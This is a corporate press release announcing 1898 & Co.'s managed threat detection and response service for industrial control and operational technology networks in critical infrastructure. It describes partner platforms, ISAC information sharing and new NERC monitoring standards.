“Managing security for ICS and OT is a rare capability for a reason: Critical infrastructure is a highly complex environment,” says Chris Underwood, vice president and general manager of 1898 & Co. “At 1898 & Co., our consultants live and breathe critical infrastructure. We’ve worked in the industry and for the industry, so we have a deep understanding of its challenges.”

1898 & Co.’s Managed Threat Protection & Response service, through intelligence enrichment and insights gained from collective defense information sharing, leverages a variety of indicators and tactics, techniques and procedures to provide 24x7 threat monitoring and detection. 1898 & Co.’s service also proactively hunts for possible intrusions within clients’ OT and ICS.

Industry analysts note that incidents in these environments are inevitable, however damage and fallout can be lessened through rapid detection and response capabilities. Additionally, regulatory measures continue to evolve in response to the heightened threats posed to critical infrastructure companies. For example, Federal Energy Regulatory Commission recently directed the North American Electric Reliability Corporation to develop reliability standards requiring Internal Network Security Monitoring standards. These new standards require power utilities to implement monitoring and detection and identify anomalous activity by way of regulatory mandate, a significant development for that industry.

“Cyber-related risk remains a top concern and consideration for every critical infrastructure company,” says Matt Morris, managing director of Security & Risk Consulting, 1898 & Co. “We continue to see increasing digitization, threats and corresponding regulation. Given the increasing talent shortage, keeping critical processes operational is getting more and more complicated. As specialists who focus on critical infrastructure cybersecurity, we uniquely understand how these environments are designed, built and operated, and we have an unmatched team of engineers and consultants at our back.”

The new capability and MSS services from 1898 & Co. are now available and uniquely leverages multiple on-premise monitoring and detection partner platforms, including Dragos, Claroty and Armis, with a limited number of platforms expected to be added over time. The MSS provides active response via CrowdStrike Falcon platform, an industry-leading security solution. The MSS service also provides the additional value of OT asset discovery, inventory and reporting to include vulnerabilities and network topology mapping.

1898 & Co. has also collaborated with various information sharing and analysis centers (ISACs) to access various industry-specific indicators of compromise and tactics, techniques, and procedures. Initial affiliates include the E-ISAC (electric utilities) and WaterISAC (water utilities), with additional ISACs on the roadmap.   
This summer, 1898 & Co. will launch an upgraded, next generation security operations center (SOC) for advanced protection and response.

**About 1898 & Co.**

1898 & Co. is a global business and technology consultancy that brings together a unique blend of engineers and industry leaders to deliver strategic business insights and solutions for critical infrastructure industries. We partner with clients to plan, invest, secure and optimize critical assets for a successful, sustainable future. For more information, visit 1898andCo.com.

**About Burns & McDonnell**

Burns & McDonnell is a family of companies bringing together an unmatched team of more than 13,500 engineers, construction and craft professionals, architects, planners, technologists, and scientists to design and build our critical infrastructure. With an integrated construction and design mindset, we offer full-service capabilities. Founded in 1898 and working from 70 offices globally, Burns & McDonnell is 100% employee-owned. Learn how we are designed to build.

Tag

#intel